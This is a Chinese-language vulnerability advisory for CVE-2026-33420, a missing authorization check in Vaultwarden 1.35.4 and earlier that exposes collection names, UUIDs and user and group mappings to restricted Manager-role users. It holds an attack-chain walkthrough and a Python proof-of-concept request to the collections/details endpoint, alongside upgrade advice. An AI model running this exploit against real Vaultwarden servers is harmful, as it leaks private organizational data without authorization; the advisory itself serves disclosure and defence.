IPBUF安全漏洞报告
English
CVE-2026-33420 CVSS 5.3 中危

CVE-2026-33420 Vaultwarden 信息泄露漏洞

披露日期: 2026-05-05

漏洞信息

漏洞编号
CVE-2026-33420
漏洞类型
权限缺失
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Vaultwarden

相关标签

权限缺失信息泄露VaultwardenCVE-2026-33420

漏洞概述

Vaultwarden 1.35.4及更早版本由于特定端点缺少必要的授权检查,导致存在权限缺失漏洞。具有Manager角色的用户在未配置完全访问权限且无具体集合分配的情况下,仍能越权访问并获取组织内所有集合的名称、UUID以及用户与组的映射数据,造成敏感信息泄露。

技术细节

该漏洞的根源在于Vaultwarden后端代码在处理`GET /api/organizations/{org_id}/collections/details`请求时,未能正确调用`has_full_access()`函数进行权限校验。与其兄弟端点`/organizations/{org_id}/collections`相比,该接口的访问控制逻辑存在疏漏。在正常逻辑下,仅当用户拥有完全访问权限或被明确分配至特定集合时,才能查看集合详情。然而,由于此漏洞,任何具有Manager角色的用户,即使其`accessAll`标志为False且未被分配任何集合,只需向该端点发送HTTP GET请求,即可绕过限制。服务器将返回组织内所有集合的名称、UUID、用户与集合的映射关系以及组与集合的映射关系,导致敏感组织架构信息泄露。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标Vaultwarden服务器并获取有效的Manager角色用户凭证(Token)。
STEP 2
2. 发起请求
攻击者使用获取的Token构造HTTP GET请求,访问`/api/organizations/{org_id}/collections/details`端点。
STEP 3
3. 权限绕过
由于服务器端缺少`has_full_access()`检查,请求被接受,即使该Manager没有完全访问权限。
STEP 4
4. 数据泄露
服务器返回组织内所有集合的详细信息,包括UUID、用户映射和组映射数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Configuration TARGET_URL = "https://<vaultwarden-host>/api/organizations/{org_id}/collections/details" AUTH_TOKEN = "<manager_access_token>" # Token for a Manager with limited access ORG_ID = "<target_organization_uuid>" headers = { "Authorization": f"Bearer {AUTH_TOKEN}", "Content-Type": "application/json" } # Exploit: Access collections details without full access permission try: response = requests.get(TARGET_URL.replace("{org_id}", ORG_ID), headers=headers) if response.status_code == 200: print("[+] Vulnerability Exploited Successfully!") print("[+] Leaked Organization Data:") print(response.json()) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error occurred: {e}")

影响范围

Vaultwarden <= 1.35.4

防御指南

临时缓解措施
建议立即将Vaultwarden服务器升级到1.35.5版本以彻底修复该漏洞。如果无法立即升级,应严格限制Manager角色的账户数量,并确保这些账户仅分配给可信人员,同时加强网络访问控制。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表